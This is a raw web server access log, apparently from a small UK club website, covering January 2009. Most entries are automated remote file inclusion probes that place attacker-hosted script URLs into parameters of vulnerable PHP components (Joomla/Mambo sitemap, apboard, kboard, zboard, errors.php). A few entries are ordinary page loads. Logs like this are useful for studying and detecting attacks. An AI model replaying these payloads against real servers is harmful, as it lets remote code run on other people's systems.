218.234.21.131 - - [02/Jan/2009:22:20:16 +0000] "GET /log/web.log.3//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://srip.yonsei.ac.kr/zboard_eng//skin/zero_vote/info.txt???? HTTP/1.1" 404 362 "-" "libwww-perl/5.79" 233 601
218.234.21.131 - - [02/Jan/2009:22:20:19 +0000] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://srip.yonsei.ac.kr/zboard_eng//skin/zero_vote/info.txt???? HTTP/1.1" 404 347 "-" "libwww-perl/5.79" 219 586
218.234.21.131 - - [02/Jan/2009:22:20:19 +0000] "GET /log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://srip.yonsei.ac.kr/zboard_eng//skin/zero_vote/info.txt???? HTTP/1.1" 404 352 "-" "libwww-perl/5.79" 223 591
216.168.96.50 - - [02/Jan/2009:22:20:53 +0000] "GET /log/web.log.5//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://start4all.biz//flatcalendar/oye.txt? HTTP/1.1" 404 418 "-" "libwww-perl/5.65" 266 657
69.72.250.130 - - [02/Jan/2009:22:21:05 +0000] "GET /log/web.log.4//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://start4all.biz//flatcalendar/oye.txt? HTTP/1.1" 404 418 "-" "libwww-perl/5.813" 267 657
69.72.250.130 - - [02/Jan/2009:22:21:06 +0000] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://start4all.biz//flatcalendar/oye.txt? HTTP/1.1" 404 403 "-" "libwww-perl/5.813" 253 642
69.72.250.130 - - [02/Jan/2009:22:21:07 +0000] "GET /log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://start4all.biz//flatcalendar/oye.txt? HTTP/1.1" 404 408 "-" "libwww-perl/5.813" 257 647
69.72.250.130 - - [02/Jan/2009:22:23:30 +0000] "GET /log/web.log.5//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://start4all.biz//flatcalendar/oye.txt? HTTP/1.1" 404 418 "-" "libwww-perl/5.813" 267 657
91.142.214.201 - - [02/Jan/2009:22:26:32 +0000] "GET /log/web.log.4///?sIncPath=http://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 404 353 "-" "libwww-perl/5.805" 193 592
91.142.214.201 - - [02/Jan/2009:22:26:32 +0000] "GET /log///?sIncPath=http://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 200 3179 "-" "libwww-perl/5.805" 183 3406
91.142.214.201 - - [02/Jan/2009:22:26:32 +0000] "GET ///?sIncPath=http://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 200 16348 "-" "libwww-perl/5.805" 179 16665
91.142.214.201 - - [02/Jan/2009:22:26:38 +0000] "GET /log/web.log.4///?sIncPath=http://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 404 353 "-" "libwww-perl/5.805" 193 592
91.142.214.201 - - [02/Jan/2009:22:26:38 +0000] "GET /log///?sIncPath=http://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 200 3179 "-" "libwww-perl/5.805" 183 3406
91.142.214.201 - - [02/Jan/2009:22:26:38 +0000] "GET ///?sIncPath=http://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 200 16348 "-" "libwww-perl/5.805" 179 16665
209.46.18.195 - - [02/Jan/2009:22:29:25 +0000] "GET /log/errors.php?error=http://clan.gotr00t.net/temp//ctrl.txt???? HTTP/1.1" 404 351 "-" "libwww-perl/5.805" 181 590
209.46.18.195 - - [02/Jan/2009:22:29:25 +0000] "GET /errors.php?error=http://clan.gotr00t.net/temp//ctrl.txt???? HTTP/1.1" 404 347 "-" "libwww-perl/5.805" 177 586
209.46.18.195 - - [02/Jan/2009:22:29:25 +0000] "GET /log/web.log.4/errors.php?error=http://clan.gotr00t.net/temp//ctrl.txt???? HTTP/1.1" 404 361 "-" "libwww-perl/5.805" 191 600
209.46.18.195 - - [02/Jan/2009:22:29:46 +0000] "GET /log/web.log.5/errors.php?error=http://clan.gotr00t.net/temp//ctrl.txt???? HTTP/1.1" 404 361 "-" "libwww-perl/5.805" 191 600
91.121.162.129 - - [02/Jan/2009:22:30:33 +0000] "GET /log/web.log.4/errors.php?error=? HTTP/1.1" 404 361 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" 217 600
91.121.162.129 - - [02/Jan/2009:22:30:42 +0000] "GET /errors.php?error=? HTTP/1.1" 404 347 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" 203 586
91.121.162.129 - - [02/Jan/2009:22:30:42 +0000] "GET /log/errors.php?error=? HTTP/1.1" 404 351 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" 207 590
91.121.162.129 - - [02/Jan/2009:22:31:11 +0000] "GET /log/web.log.5/errors.php?error=? HTTP/1.1" 404 361 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" 217 600
84.19.190.18 - - [02/Jan/2009:22:33:17 +0000] "GET /log/web.log.1//component/option,com_sitemap/Itemid,141/components/com_sitemap/sitemap.php?mosConfig_admin_=http://vennom.t35.com/idfell.txt??? HTTP/1.1" 404 426 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" 317 665
84.19.190.18 - - [02/Jan/2009:22:33:17 +0000] "GET //component/option,com_sitemap/Itemid,141/components/com_sitemap/sitemap.php?mosConfig_admin_=http://vennom.t35.com/idfell.txt??? HTTP/1.1" 404 411 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" 303 650
84.19.190.18 - - [02/Jan/2009:22:33:17 +0000] "GET /log//component/option,com_sitemap/Itemid,141/components/com_sitemap/sitemap.php?mosConfig_admin_=http://vennom.t35.com/idfell.txt??? HTTP/1.1" 404 416 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" 307 655
193.86.246.132 - - [02/Jan/2009:22:34:20 +0000] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kortech.cn/bbs//skin/zero_vote/logi.txt???? HTTP/1.1" 404 347 "-" "libwww-perl/5.813" 238 586
217.148.95.133 - - [02/Jan/2009:22:34:35 +0000] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 375 "-" "Mozilla/5.0" 222 614
217.148.95.133 - - [02/Jan/2009:22:34:35 +0000] "GET /log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 380 "-" "Mozilla/5.0" 226 619
217.148.95.133 - - [02/Jan/2009:22:34:35 +0000] "GET /log/web.log.3%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 392 "-" "Mozilla/5.0" 242 631
217.148.95.133 - - [02/Jan/2009:22:34:54 +0000] "GET /log/web.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 390 "-" "Mozilla/5.0" 240 629
91.142.214.201 - - [02/Jan/2009:22:36:09 +0000] "GET /apboard/add.php?APB_rp=http://www.v13.50webs.com/iddd.jpg?? HTTP/1.1" 404 352 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" 239 591
91.142.214.201 - - [02/Jan/2009:22:36:09 +0000] "GET /log/apboard/add.php?APB_rp=http://www.v13.50webs.com/iddd.jpg?? HTTP/1.1" 404 356 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" 243 595
91.142.214.201 - - [02/Jan/2009:22:36:09 +0000] "GET /log/web.log/apboard/add.php?APB_rp=http://www.v13.50webs.com/iddd.jpg?? HTTP/1.1" 404 364 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" 251 603
63.247.65.114 - - [02/Jan/2009:22:37:57 +0000] "GET /log/web.log/apboard/add.php?APB_rp=http://www.v13.50webs.com/iddd.jpg?? HTTP/1.1" 404 364 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" 236 603
63.247.65.114 - - [02/Jan/2009:22:37:57 +0000] "GET /log/apboard/add.php?APB_rp=http://www.v13.50webs.com/iddd.jpg?? HTTP/1.1" 404 356 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" 228 595
63.247.65.114 - - [02/Jan/2009:22:37:57 +0000] "GET /apboard/add.php?APB_rp=http://www.v13.50webs.com/iddd.jpg?? HTTP/1.1" 404 352 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" 224 591
63.247.65.114 - - [02/Jan/2009:22:40:35 +0000] "GET /log/web.log/apboard/add.php?APB_rp=http://www.v13.50webs.com/iddd.jpg?? HTTP/1.1" 404 364 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" 253 603
63.247.65.114 - - [02/Jan/2009:22:40:36 +0000] "GET /apboard/add.php?APB_rp=http://www.v13.50webs.com/iddd.jpg?? HTTP/1.1" 404 352 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" 241 591
63.247.65.114 - - [02/Jan/2009:22:40:37 +0000] "GET /log/apboard/add.php?APB_rp=http://www.v13.50webs.com/iddd.jpg?? HTTP/1.1" 404 356 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" 245 595
91.142.214.201 - - [02/Jan/2009:22:40:52 +0000] "GET /log/web.log.4/apboard/add.php?APB_rp=http://www.v13.50webs.com/iddd.jpg?? HTTP/1.1" 404 366 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" 253 605
63.247.65.114 - - [02/Jan/2009:22:40:52 +0000] "GET /log/web.log/apboard/add.php?APB_rp=http://www.v13.50webs.com/iddd.jpg?? HTTP/1.1" 404 364 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" 266 603
63.247.65.114 - - [02/Jan/2009:22:40:52 +0000] "GET /apboard/add.php?APB_rp=http://www.v13.50webs.com/iddd.jpg?? HTTP/1.1" 404 352 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" 254 591
63.247.65.114 - - [02/Jan/2009:22:40:53 +0000] "GET /log/apboard/add.php?APB_rp=http://www.v13.50webs.com/iddd.jpg?? HTTP/1.1" 404 356 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" 258 595
63.247.65.114 - - [02/Jan/2009:22:41:11 +0000] "GET /log/web.log.4/apboard/add.php?APB_rp=http://www.v13.50webs.com/iddd.jpg?? HTTP/1.1" 404 366 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" 255 605
63.247.65.114 - - [02/Jan/2009:22:41:53 +0000] "GET /log/web.log/apboard/add.php?APB_rp=http://www.v13.50webs.com/iddd.jpg?? HTTP/1.1" 404 364 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" 266 603
63.247.65.114 - - [02/Jan/2009:22:41:53 +0000] "GET /apboard/add.php?APB_rp=http://www.v13.50webs.com/iddd.jpg?? HTTP/1.1" 404 352 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" 254 591
63.247.65.114 - - [02/Jan/2009:22:41:54 +0000] "GET /log/apboard/add.php?APB_rp=http://www.v13.50webs.com/iddd.jpg?? HTTP/1.1" 404 356 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" 258 595
218.234.21.131 - - [02/Jan/2009:22:42:28 +0000] "GET /log/web.log.3//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://srip.yonsei.ac.kr/zboard_eng//skin/zero_vote/info.txt???? HTTP/1.1" 404 362 "-" "libwww-perl/5.79" 233 601
63.247.65.114 - - [02/Jan/2009:22:42:30 +0000] "GET /log/web.log.4/apboard/add.php?APB_rp=http://www.v13.50webs.com/iddd.jpg?? HTTP/1.1" 404 366 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" 268 605
218.234.21.131 - - [02/Jan/2009:22:42:31 +0000] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://srip.yonsei.ac.kr/zboard_eng//skin/zero_vote/info.txt???? HTTP/1.1" 404 347 "-" "libwww-perl/5.79" 219 586
218.234.21.131 - - [02/Jan/2009:22:42:31 +0000] "GET /log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://srip.yonsei.ac.kr/zboard_eng//skin/zero_vote/info.txt???? HTTP/1.1" 404 352 "-" "libwww-perl/5.79" 223 591
63.247.65.114 - - [02/Jan/2009:22:42:33 +0000] "GET /log/web.log.4/apboard/add.php?APB_rp=http://www.v13.50webs.com/iddd.jpg?? HTTP/1.1" 404 366 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" 268 605
63.247.65.114 - - [02/Jan/2009:22:42:38 +0000] "GET /log/web.log.4/apboard/add.php?APB_rp=http://www.v13.50webs.com/iddd.jpg?? HTTP/1.1" 404 366 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" 238 605
218.149.85.37 - - [02/Jan/2009:22:44:38 +0000] "GET /log/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.lazar.ru/manager/processors/min.txt? HTTP/1.1" 404 379 "-" "Mozilla/5.0" 198 618
218.149.85.37 - - [02/Jan/2009:22:44:38 +0000] "GET /log/web.log.1%20%20/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.lazar.ru/manager/processors/min.txt? HTTP/1.1" 404 391 "-" "Mozilla/5.0" 214 630
218.149.85.37 - - [02/Jan/2009:22:44:38 +0000] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.lazar.ru/manager/processors/min.txt? HTTP/1.1" 404 375 "-" "Mozilla/5.0" 194 614
83.104.50.248 - - [02/Jan/2009:22:46:36 +0000] "GET / HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; InfoPath.1)" 342 249
83.104.50.248 - - [02/Jan/2009:22:46:37 +0000] "GET /YTCC.css HTTP/1.1" 304 - "http://www.ytcc.co.uk/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; InfoPath.1)" 382 247
83.104.50.248 - - [02/Jan/2009:22:46:37 +0000] "GET /PageHeader1b.jpg HTTP/1.1" 304 - "http://www.ytcc.co.uk/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; InfoPath.1)" 392 249
83.104.50.248 - - [02/Jan/2009:22:46:38 +0000] "GET /HomeButton.swf HTTP/1.1" 304 - "http://www.ytcc.co.uk/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; InfoPath.1)" 416 247
83.104.50.248 - - [02/Jan/2009:22:46:38 +0000] "GET /FormsButton.swf HTTP/1.1" 304 - "http://www.ytcc.co.uk/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; InfoPath.1)" 417 247
83.104.50.248 - - [02/Jan/2009:22:46:38 +0000] "GET /DiaryButton.swf HTTP/1.1" 304 - "http://www.ytcc.co.uk/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; InfoPath.1)" 417 248
83.104.50.248 - - [02/Jan/2009:22:46:38 +0000] "GET /NowThenSithee.swf HTTP/1.1" 304 - "http://www.ytcc.co.uk/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; InfoPath.1)" 419 247
83.104.50.248 - - [02/Jan/2009:22:46:38 +0000] "GET /GalleryButton.swf HTTP/1.1" 304 - "http://www.ytcc.co.uk/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; InfoPath.1)" 419 247
83.104.50.248 - - [02/Jan/2009:22:46:38 +0000] "GET /ShowreportsButton.swf HTTP/1.1" 304 - "http://www.ytcc.co.uk/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; InfoPath.1)" 423 247
83.104.50.248 - - [02/Jan/2009:22:46:38 +0000] "GET /WR%20Current%20logo1.jpg HTTP/1.1" 304 - "http://www.ytcc.co.uk/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; InfoPath.1)" 399 248
83.104.50.248 - - [02/Jan/2009:22:46:38 +0000] "GET /Index_clip_image002.jpg HTTP/1.1" 304 - "http://www.ytcc.co.uk/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; InfoPath.1)" 398 248
83.104.50.248 - - [02/Jan/2009:22:46:38 +0000] "GET /banner-468.jpg HTTP/1.1" 304 - "http://www.ytcc.co.uk/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; InfoPath.1)" 389 248
83.104.50.248 - - [02/Jan/2009:22:46:39 +0000] "GET /Logo%20with%20letters1_small.jpg HTTP/1.1" 304 - "http://www.ytcc.co.uk/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; InfoPath.1)" 407 248
83.104.50.248 - - [02/Jan/2009:22:46:39 +0000] "GET /news_in_bigred.jpg HTTP/1.1" 304 - "http://www.ytcc.co.uk/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; InfoPath.1)" 393 248
83.104.50.248 - - [02/Jan/2009:22:46:39 +0000] "GET /get_adobe_reader.gif HTTP/1.1" 304 - "http://www.ytcc.co.uk/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; InfoPath.1)" 394 247
202.181.99.28 - - [02/Jan/2009:22:47:04 +0000] "GET //?_zb_path=http://www.viparenda.ru/includes/images/alba.txt? HTTP/1.1" 200 16348 "-" "libwww-perl/5.805" 178 16665
77.221.130.2 - - [02/Jan/2009:22:55:13 +0000] "GET /errors.php?error=http://baaaaaa.altervista.org/idv.txt??? HTTP/1.1" 404 347 "-" "libwww-perl/5.805" 175 586
77.221.130.2 - - [02/Jan/2009:22:55:13 +0000] "GET /log/errors.php?error=http://baaaaaa.altervista.org/idv.txt??? HTTP/1.1" 404 351 "-" "libwww-perl/5.805" 179 590
77.221.130.2 - - [02/Jan/2009:22:55:13 +0000] "GET /log/web.log.5%20/errors.php?error=http://baaaaaa.altervista.org/idv.txt??? HTTP/1.1" 404 362 "-" "libwww-perl/5.805" 192 601
77.221.130.2 - - [02/Jan/2009:22:55:49 +0000] "GET /log/web.log.4%20/errors.php?error=http://baaaaaa.altervista.org/idv.txt??? HTTP/1.1" 404 362 "-" "libwww-perl/5.805" 192 601
77.221.130.2 - - [02/Jan/2009:22:55:55 +0000] "GET /log/web.log.3%20/errors.php?error=http://baaaaaa.altervista.org/idv.txt??? HTTP/1.1" 404 362 "-" "libwww-perl/5.805" 192 601
77.221.130.2 - - [02/Jan/2009:22:56:01 +0000] "GET /log/web.log.1%20/errors.php?error=http://baaaaaa.altervista.org/idv.txt??? HTTP/1.1" 404 362 "-" "libwww-perl/5.805" 192 601
77.221.130.2 - - [02/Jan/2009:22:56:11 +0000] "GET /log/web.log.2%20/errors.php?error=http://baaaaaa.altervista.org/idv.txt??? HTTP/1.1" 404 362 "-" "libwww-perl/5.805" 192 601
202.181.99.28 - - [02/Jan/2009:22:59:15 +0000] "GET /log/web.log.3//?_zb_path=http://www.viparenda.ru/includes/images/alba.txt? HTTP/1.1" 404 352 "-" "libwww-perl/5.805" 192 591
202.181.99.28 - - [02/Jan/2009:22:59:16 +0000] "GET //?_zb_path=http://www.viparenda.ru/includes/images/alba.txt? HTTP/1.1" 200 16348 "-" "libwww-perl/5.805" 178 16665
202.181.99.28 - - [02/Jan/2009:22:59:18 +0000] "GET /log//?_zb_path=http://www.viparenda.ru/includes/images/alba.txt? HTTP/1.1" 200 3178 "-" "libwww-perl/5.805" 182 3405
77.221.130.2 - - [02/Jan/2009:23:03:23 +0000] "GET /log/web.log.4/apboard/add.php?APB_rp=http://necis-a.biz/aank/keren.jpg??? HTTP/1.1" 404 366 "-" "libwww-perl/5.805" 191 605
77.221.130.2 - - [02/Jan/2009:23:03:23 +0000] "GET /apboard/add.php?APB_rp=http://necis-a.biz/aank/keren.jpg??? HTTP/1.1" 404 352 "-" "libwww-perl/5.805" 177 591
77.221.130.2 - - [02/Jan/2009:23:03:23 +0000] "GET /log/apboard/add.php?APB_rp=http://necis-a.biz/aank/keren.jpg??? HTTP/1.1" 404 356 "-" "libwww-perl/5.805" 181 595
77.221.130.2 - - [02/Jan/2009:23:03:52 +0000] "GET /log/web.log.3/apboard/add.php?APB_rp=http://necis-a.biz/aank/keren.jpg??? HTTP/1.1" 404 366 "-" "libwww-perl/5.805" 191 605
222.231.47.146 - - [02/Jan/2009:23:03:59 +0000] "GET /log/web.log.3/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://geocities.com/kombinasi2000/id.txt???? HTTP/1.1" 404 385 "-" "libwww-perl/5.805" 233 624
222.231.47.146 - - [02/Jan/2009:23:03:59 +0000] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://geocities.com/kombinasi2000/id.txt???? HTTP/1.1" 404 371 "-" "libwww-perl/5.805" 219 610
222.231.47.146 - - [02/Jan/2009:23:03:59 +0000] "GET /log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://geocities.com/kombinasi2000/id.txt???? HTTP/1.1" 404 375 "-" "libwww-perl/5.805" 223 614
218.149.85.37 - - [02/Jan/2009:23:04:36 +0000] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.lazar.ru/manager/processors/min.txt? HTTP/1.1" 404 354 "-" "Mozilla/5.0" 164 593
218.149.85.37 - - [02/Jan/2009:23:04:41 +0000] "GET /log/web.log.4%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.lazar.ru/manager/processors/min.txt? HTTP/1.1" 404 371 "-" "Mozilla/5.0" 184 610
218.149.85.37 - - [02/Jan/2009:23:04:41 +0000] "GET /log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.lazar.ru/manager/processors/min.txt? HTTP/1.1" 404 359 "-" "Mozilla/5.0" 168 598
222.231.47.146 - - [02/Jan/2009:23:04:48 +0000] "GET /log/web.log.1/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://geocities.com/kombinasi2000/id.txt???? HTTP/1.1" 404 385 "-" "libwww-perl/5.805" 233 624
67.195.37.159 - - [02/Jan/2009:23:08:44 +0000] "GET /WiltonPark2008WebEntry.pdf HTTP/1.0" 200 454550 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 409 454875
77.221.130.2 - - [02/Jan/2009:23:09:04 +0000] "GET /log/web.log.3/apboard/add.php?APB_rp=http://necis-a.biz/aank/keren.jpg??? HTTP/1.1" 404 366 "-" "libwww-perl/5.805" 191 605
77.221.130.2 - - [02/Jan/2009:23:09:04 +0000] "GET /apboard/add.php?APB_rp=http://necis-a.biz/aank/keren.jpg??? HTTP/1.1" 404 352 "-" "libwww-perl/5.805" 177 591
77.221.130.2 - - [02/Jan/2009:23:09:04 +0000] "GET /log/apboard/add.php?APB_rp=http://necis-a.biz/aank/keren.jpg??? HTTP/1.1" 404 356 "-" "libwww-perl/5.805" 181 595
121.170.11.100 - - [02/Jan/2009:23:09:31 +0000] "GET /log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://harasyeen.webs.com/id.txt????? HTTP/1.1" 404 352 "-" "libwww-perl/5.79" 196 591
121.170.11.100 - - [02/Jan/2009:23:09:31 +0000] "GET /log/web.log.3%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://harasyeen.webs.com/id.txt????? HTTP/1.1" 404 363 "-" "libwww-perl/5.79" 209 602
121.170.11.100 - - [02/Jan/2009:23:09:31 +0000] "GET /log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://harasyeen.webs.com/id.txt????? HTTP/1.1" 404 352 "-" "libwww-perl/5.79" 196 591
121.170.11.100 - - [02/Jan/2009:23:09:31 +0000] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://rama.fileave.com/seorangkeparat.txt????? HTTP/1.1" 404 347 "-" "libwww-perl/5.79" 202 586
121.170.11.100 - - [02/Jan/2009:23:09:31 +0000] "GET /log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://rama.fileave.com/seorangkeparat.txt????? HTTP/1.1" 404 352 "-" "libwww-perl/5.79" 206 591
121.170.11.100 - - [02/Jan/2009:23:09:31 +0000] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://harasyeen.webs.com/id.txt????? HTTP/1.1" 404 347 "-" "libwww-perl/5.79" 192 586
121.170.11.100 - - [02/Jan/2009:23:09:31 +0000] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://harasyeen.webs.com/id.txt????? HTTP/1.1" 404 347 "-" "libwww-perl/5.79" 192 586
121.170.11.100 - - [02/Jan/2009:23:09:31 +0000] "GET /log/web.log.3%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://rama.fileave.com/seorangkeparat.txt????? HTTP/1.1" 404 363 "-" "libwww-perl/5.79" 219 602
121.170.11.100 - - [02/Jan/2009:23:09:31 +0000] "GET /log/web.log.3%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://harasyeen.webs.com/id.txt????? HTTP/1.1" 404 363 "-" "libwww-perl/5.79" 209 602
66.128.49.18 - - [02/Jan/2009:23:10:39 +0000] "GET /log/web.log.3//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.stadtgezeiten.de/layout/layout.txt??? HTTP/1.1" 404 362 "-" "libwww-perl/5.810" 246 601
66.128.49.18 - - [02/Jan/2009:23:10:39 +0000] "GET /log/web.log.3//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.stadtgezeiten.de/layout/layout.txt??? HTTP/1.1" 404 362 "-" "libwww-perl/5.810" 246 601
66.128.49.18 - - [02/Jan/2009:23:10:39 +0000] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.stadtgezeiten.de/layout/layout.txt??? HTTP/1.1" 404 347 "-" "libwww-perl/5.810" 232 586
66.128.49.18 - - [02/Jan/2009:23:10:39 +0000] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.stadtgezeiten.de/layout/layout.txt??? HTTP/1.1" 404 347 "-" "libwww-perl/5.810" 232 586
66.128.49.18 - - [02/Jan/2009:23:10:40 +0000] "GET /log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.stadtgezeiten.de/layout/layout.txt??? HTTP/1.1" 404 352 "-" "libwww-perl/5.810" 236 591
66.128.49.18 - - [02/Jan/2009:23:10:40 +0000] "GET /log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.stadtgezeiten.de/layout/layout.txt??? HTTP/1.1" 404 352 "-" "libwww-perl/5.810" 236 591
193.207.106.54 - - [02/Jan/2009:23:10:46 +0000] "GET /log/web.log.3/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://geocities.com/kombinasi2000/id.txt?%0D?? HTTP/1.1" 404 385 "-" "libwww-perl/5.79" 206 624
193.207.106.54 - - [02/Jan/2009:23:10:46 +0000] "GET /log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://geocities.com/kombinasi2000/id.txt?%0D?? HTTP/1.1" 404 375 "-" "libwww-perl/5.79" 196 614
193.207.106.54 - - [02/Jan/2009:23:10:46 +0000] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://geocities.com/kombinasi2000/id.txt?%0D?? HTTP/1.1" 404 371 "-" "libwww-perl/5.79" 192 610
